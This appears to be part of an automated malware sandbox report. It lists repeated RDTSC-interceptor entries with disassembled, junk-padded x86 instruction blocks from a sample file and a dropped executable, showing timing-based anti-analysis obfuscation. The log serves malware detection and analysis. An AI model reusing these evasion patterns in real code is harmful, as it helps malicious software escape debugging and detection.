Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1349D65 second address: 1349D9B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FECC5126356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FECC5126366h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 jmp 00007FECC512635Ch 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134B267 second address: 134B26D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134B26D second address: 134B273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134B273 second address: 134B279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134B279 second address: 134B27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134B27D second address: 134B28D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134CF13 second address: 134CF2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126366h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134CAA0 second address: 134CAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B0266 second address: 59B0285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FECC512635Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B0285 second address: 59B0289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B0289 second address: 59B028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B0339 second address: 59B0351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECC5476B34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B0351 second address: 59B0395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC512635Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FECC512635Bh 0x00000015 add al, 0000002Eh 0x00000018 jmp 00007FECC5126369h 0x0000001d popfd 0x0000001e mov ecx, 0F70D4B7h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B0395 second address: 59B039B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12650D3 second address: 12650D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1265299 second address: 126529E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12654ED second address: 12654FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC512635Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12654FB second address: 1265510 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FECC5476B28h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B03CE second address: 59B03DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECC512635Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B03DE second address: 59B03E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B03E2 second address: 59B0406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c push ecx 0x0000000d mov ebx, 28653D5Ah 0x00000012 pop edx 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FECC512635Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B0406 second address: 59B04B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FECC5476B37h 0x00000009 xor ecx, 3739385Eh 0x0000000f jmp 00007FECC5476B39h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FECC5476B30h 0x0000001b adc esi, 218ABC58h 0x00000021 jmp 00007FECC5476B2Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a mov ebp, esp 0x0000002c jmp 00007FECC5476B36h 0x00000031 pop ebp 0x00000032 pushad 0x00000033 movzx eax, dx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushfd 0x00000039 jmp 00007FECC5476B39h 0x0000003e add cx, 7956h 0x00000043 jmp 00007FECC5476B31h 0x00000048 popfd 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B04B7 second address: 59B04BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 5DF3D0 second address: 5DF3E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5476B2Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75997F second address: 75998B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FECC5126356h 0x0000000c rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 759F01 second address: 759F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 759F05 second address: 759F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75A061 second address: 75A065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75A065 second address: 75A069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75A069 second address: 75A090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FECC5476B3Ch 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75D0C1 second address: 75D0DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC512635Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c jc 00007FECC512635Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75D0DF second address: 75D11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007FECC5476B28h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 0000001Bh 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 xor ch, 00000043h 0x00000023 push 00000000h 0x00000025 movzx ecx, di 0x00000028 push 10801427h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 jnp 00007FECC5476B26h 0x00000036 pop eax 0x00000037 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75D11F second address: 75D1A3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FECC5126358h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 108014A7h 0x00000013 push edx 0x00000014 jmp 00007FECC512635Dh 0x00000019 pop edi 0x0000001a push 00000003h 0x0000001c or dword ptr [ebp+122D36CEh], edx 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007FECC5126358h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000016h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e xor dword ptr [ebp+122D2D31h], edx 0x00000044 clc 0x00000045 push 00000003h 0x00000047 push 00000000h 0x00000049 push ebx 0x0000004a call 00007FECC5126358h 0x0000004f pop ebx 0x00000050 mov dword ptr [esp+04h], ebx 0x00000054 add dword ptr [esp+04h], 00000019h 0x0000005c inc ebx 0x0000005d push ebx 0x0000005e ret 0x0000005f pop ebx 0x00000060 ret 0x00000061 mov esi, dword ptr [ebp+122D3BE9h] 0x00000067 push B9F9F112h 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75D1A3 second address: 75D1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75D1AA second address: 75D1E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC512635Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 79F9F112h 0x00000010 mov dword ptr [ebp+122D371Ch], ebx 0x00000016 lea ebx, dword ptr [ebp+12451DAFh] 0x0000001c jmp 00007FECC5126360h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push esi 0x00000026 pop esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75D1E7 second address: 75D1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75D274 second address: 75D278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75D278 second address: 75D27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75D27E second address: 75D284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75D284 second address: 75D288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 75D288 second address: 75D28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 76DB93 second address: 76DB99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 76DB99 second address: 76DB9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 752CE0 second address: 752CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FECC5476B34h 0x0000000c rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 752CFB second address: 752D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 752D01 second address: 752D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 752D05 second address: 752D16 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FECC5126356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 752D16 second address: 752D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 752D1B second address: 752D20 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77B997 second address: 77B99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77B99B second address: 77B9A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77BB0E second address: 77BB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77BB12 second address: 77BB2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126366h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77BC55 second address: 77BC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77BC5B second address: 77BC77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FECC5126366h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77C1CA second address: 77C1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77C1D2 second address: 77C1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FECC512635Dh 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77C1E4 second address: 77C222 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FECC5476B2Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jbe 00007FECC5476B26h 0x00000010 jmp 00007FECC5476B2Ah 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jnp 00007FECC5476B3Ch 0x0000001e pushad 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77C7AC second address: 77C7B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77D34E second address: 77D359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77D7C5 second address: 77D7C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77D7C9 second address: 77D7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5476B2Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 77D7DE second address: 77D7F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FECC5126362h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7816C8 second address: 7816D2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7816D2 second address: 781720 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC512635Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FECC5126366h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007FECC512635Ch 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007FECC512635Ah 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 781720 second address: 781726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 781726 second address: 78172A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7829F6 second address: 7829FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 786F0C second address: 786F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC512635Dh 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 786F25 second address: 786F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 786F2B second address: 786F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 786F31 second address: 786F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5476B38h 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007FECC5476B26h 0x00000011 je 00007FECC5476B26h 0x00000017 jne 00007FECC5476B26h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007FECC5476B26h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78764A second address: 787659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jnc 00007FECC5126356h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 787659 second address: 78765E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78941A second address: 789430 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FECC5126356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007FECC5126360h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78949D second address: 7894A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7894A2 second address: 7894A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7894A8 second address: 7894FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FECC5476B38h 0x0000000f pushad 0x00000010 jne 00007FECC5476B26h 0x00000016 jmp 00007FECC5476B30h 0x0000001b popad 0x0000001c popad 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FECC5476B30h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7894FD second address: 78951A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FECC5126368h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78951A second address: 789545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D1ED3h], edx 0x0000000e push 5929F637h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FECC5476B36h 0x0000001a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 789545 second address: 78954C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78A1AD second address: 78A1CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78A1CE second address: 78A1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FECC5126356h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78A5CA second address: 78A5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FECC5476B33h 0x0000000f rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78A5E6 second address: 78A5F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FECC5126356h 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78A775 second address: 78A783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FECC5476B2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78A783 second address: 78A798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jo 00007FECC5126364h 0x0000000c pushad 0x0000000d jnl 00007FECC5126356h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78B7A0 second address: 78B7D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5476B37h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FECC5476B37h 0x00000011 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78B7D5 second address: 78B7D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
